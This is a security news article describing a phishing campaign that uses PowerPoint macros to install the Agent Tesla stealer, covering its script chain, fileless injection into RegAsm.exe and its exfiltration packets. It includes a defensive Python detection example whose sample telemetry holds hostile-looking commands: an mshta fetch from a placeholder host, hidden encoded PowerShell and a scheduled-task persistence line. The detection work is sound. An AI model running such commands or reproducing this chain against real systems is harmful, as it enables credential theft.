Scammers use PowerPoint macros to install Agent Tesla

The organizers of the malicious campaign send emails with malware to Korean users.


A new variant of the Agent Tesla malware was used in an ongoing phishing campaign. According to experts from Fortinet, attackers send out emails to Korean users purportedly containing “order” details. The emails contain malicious Microsoft PowerPoint documents.

When opened, the file shows no slides; instead an auto-executing VBA function fetches and runs an HTML resource from a remote site. The escaped VBScript inside that HTML then runs a further series of scripts, including PowerShell, to install Agent Tesla silently.

Experts found the following scripts and described their functions:

  • VBScript embedded in HTML – Refreshes the malware every two hours (where possible) by registering a command-line task in Task Scheduler.
  • Standalone VBS file – Downloads a new base64-encoded VBS file and places it in the Startup folder for persistence.
  • Second standalone VBS file – Downloads Agent Tesla and generates PowerShell code.
  • PowerShell code – Executed to call the new ClassLibrary3.Class1.Run() function, which receives the Agent Tesla payload in memory.

The malware injects itself into RegAsm.exe, a legitimate Microsoft .NET executable, using four Windows API functions. Because the payload lives inside the RegAsm.exe process rather than on disk, Agent Tesla runs filelessly on the infected system, which significantly reduces the chance of detection.
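The delivery chain described above (Office document, script host, PowerShell, RegAsm.exe) and the two-hour scheduled-task refresh can be expressed as a process-lineage check. The following Python is an added example, not code from Fortinet or from the article; the image names, command-line shapes and the sample events are constructed assumptions.

```python
import re
from collections import namedtuple

# One record per process creation: pid, parent pid, image name (lower-case, no path), command line
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

# Stages of the chain described in the article; the image names are assumptions
OFFICE = {"powerpnt.exe", "winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
INJECT_TARGET = "regasm.exe"  # legitimate .NET utility abused as the in-memory host

def ancestry(event, by_pid):  # image names from the event up to its root parent (loop-safe)
    chain, cur, seen = [], event, set()
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur.image)
        cur = by_pid.get(cur.ppid)
    return chain

def find_injection_chains(events):  # RegAsm.exe descended from an Office app via a script host
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image != INJECT_TARGET: continue
        chain = ancestry(e, by_pid)
        parents = set(chain[1:])
        if parents & OFFICE and parents & SCRIPT_HOSTS:
            hits.append((e.pid, list(reversed(chain))))  # (pid, root-to-leaf lineage)
    return hits

def find_task_persistence(events):  # schtasks /create with an hourly schedule running a script host
    pat = re.compile(r"/create\b.*?/sc\s+hourly\b.*?/mo\s+(\d+)", re.I)
    hits = []
    for e in events:
        if e.image != "schtasks.exe": continue
        m = pat.search(e.cmdline)
        if m and re.search(r"wscript|mshta|powershell", e.cmdline, re.I):
            hits.append((e.pid, int(m.group(1))))  # (pid, interval in hours)
    return hits

# Constructed sample telemetry, not captured from a real infection
SAMPLE_EVENTS = [
    ProcEvent(200, 100, "powerpnt.exe", '"POWERPNT.EXE" C:\\Users\\u\\order.ppt'),
    ProcEvent(300, 200, "mshta.exe", "mshta.exe http://example.invalid/order.html"),
    ProcEvent(400, 300, "schtasks.exe", "schtasks /create /sc hourly /mo 2 /tn upd /tr wscript.exe C:\\ProgramData\\a.vbs"),
    ProcEvent(500, 300, "wscript.exe", "wscript.exe C:\\ProgramData\\a.vbs"),
    ProcEvent(600, 500, "powershell.exe", "powershell -w hidden -enc AAAA"),
    ProcEvent(700, 600, "regasm.exe", "RegAsm.exe"),
    ProcEvent(800, 100, "regasm.exe", "RegAsm.exe /codebase C:\\dev\\lib.dll"),  # benign developer use
]
```

The benign RegAsm.exe launched directly from the desktop shell is not flagged, because the rule requires both an Office ancestor and a script-host ancestor rather than the image name alone.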

Agent Tesla has keylogger features, can take screenshots, and is capable of stealing browser cookies and saved credentials as well as clipboard data. An attacker can choose which features to enable when the payload is compiled, trading capability against stealth.

In total, Agent Tesla can collect data from more than 70 applications. It can send the collected data in four ways: HTTP POST, FTP upload, SMTP, and Telegram. Each packet sent carries a number indicating its type, and there are seven packet types in total:

  • Packet “0” is the first packet and informs the attacker that Agent Tesla has launched.
  • Packet “1” is sent every 120 seconds and reports that the malware is active.
  • Packet “2” is sent every 60 seconds and contains only “header” data. Agent Tesla reads the response and checks whether it contains “uninstall”. If so, Agent Tesla removes itself from the victim’s system, including all generated files and registry keys, and the process terminates.
  • Packet “3” sends the victim’s keystrokes (keylogger data) and stolen clipboard data.
  • Packet “4” sends the captured screenshots.
  • Packet “5” sends credentials stolen from software clients.
  • Packet “6” sends cookies in a ZIP archive.
